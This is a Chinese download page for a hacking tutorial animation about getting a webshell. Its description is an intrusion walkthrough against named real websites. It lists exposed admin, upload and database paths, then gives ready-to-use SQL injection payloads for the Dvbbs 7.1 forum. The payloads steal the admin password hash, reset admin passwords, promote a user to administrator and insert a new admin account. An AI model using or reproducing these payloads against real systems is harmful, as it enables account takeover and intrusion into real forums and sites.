立即下载TS安全检测得webshell全过程

软件大小: 27.9 MB
软件语言: 简体中文
软件类别: 黑客教学 - 黑客动画
授权方式: 共享版
应用平台: Win9X/2000/XP/2003/
更新时间: 2008/8/19 17:08:02
开 发 商: 暂无信息
联 系 人: 暂无联系方式
分享收藏
更多
解压密码:本站默认解压密码:www.987654321sf.com 
推荐等级: 3星级
会员中心: 【账号登录】  【账号注册】  开通VIP下载流程
查毒情况: 尊敬的用户,本站软件个别杀毒安全软件可能会报毒,有可能是误报,但我们不能确定。请下载后自行判断和检测。点击查看详情

[复制下载页面地址给QQ/MSN上的好友]软件介绍

                  安全检测天津滨海人才网
                                    HaoSec.TS

大家好,我是HaoSec.TS,这个是我进行安全检测的思路,希望可以对大家有所帮助,当大家看到动画的时候,漏洞应该已经修补上了。
我的个人站
好安全网:www.haosec.com
安全论坛:www.haosec.com/bbs
群1(满)
群2(满)
群3(满)
群4:25569094
论坛也是给大家交流的地方,我会在上面解答所有朋友们提出的问题,经常会有大家上SKYPE
语音进行问题的讨论,也希望有更多喜爱网络安全的朋友加入到我们这里来!!!

===========================================================================
检测开始
==============================================================================
站点:http://www.bhrc.com.cn


http://www.tjlyce.com\qx      千寻网站管理系统!


http://www.tjlyce.com/eshop/admin/admin_login.asp 56770.com网店
http://www.tjlyce.com/ershou/upfile.asp  无法上传
http://www.winfore.net/editor/Admin_Default.asp   无法修改
http://www.shangyong.net/bbs/Data\Dvbbs7.mdb    Dvbbs7.1

Powered By Dvbbs Version 7.1.0 Sp1


(1):手工入侵:我们可以以注册用户找个版面发帖子,在贴子内容下有个选择帖子类型.选择论坛交易币设置",在金币数量,购买数量聘用制,VIP用户浏览选项里我们都不作任何变动,在可购买用户名单限制输入栏中,我们提交以下的SQL语句:

(假如我们注册的用户为"haosec.ts")

A:coolidea|||123',0);update(更新)/**/(代替空格)Dv_User/**/set/**/UserEmail=(select[password]from/**/Dv_admin/**/where[Username]='admin')/**/where[UserName]='haosec.ts';--

把管理员的MD5加密密码更新到用户haosec.ts的邮箱去

B:coolidea|||123',0);update/**/Dv_User/**/set/**/Userpassword='160b8f6e39dde298'/**/where[UserName]='admin';--

将管理员的前台密码改为82821188

C:coolidea|||123',0);update/**/Dv_Admin/**/set/**/password='160b8f6e39dde298'/**/where[UserName]='shellpo';--

将管理员的后台密码改为82821188(160b8f6e39dde298)解密后就是82821188

(以上论坛的管理员默认为"admin")

以上是通过修改管理员的前后的密码来登录同样我们还可以通过提交构造以下SQL语句来把注册的用户直接提升这前后台管理员,

D: $PayMoney|||',3);update [Dv_user] set usergroupid=1 where username='admin';--

把用户admin提升为前台管理员

E:coolidea|||123',0);Insert/**/into/**/Dv_admin(Password,Username,Adduser,Flag)/**/values('160b8f6e39dde298','admin','admin','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36');--

在后台添加一个用户名为"admin"的管理员,

http://www.shangyong.net/bbs/UploadFile/2007-10/200710268134322845.txt


HaoSec.ts
WWW.HAOSEC.COM/BBS

评论区        查看评论...

相关说明

    关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - VIP登陆|注册
Copyright © 2007-2011 987654321SF.Com. All Rights Reserved .
本站私服服务端和架设教程由网友发布,仅作学习使用,严禁用于商业
如本站收录的资源侵犯到您的版权,请来信告知,我们将及时更正处理,邮箱:Mail91@QQ.COM
蜀ICP备15007442号-2
点击与站长面对面交流!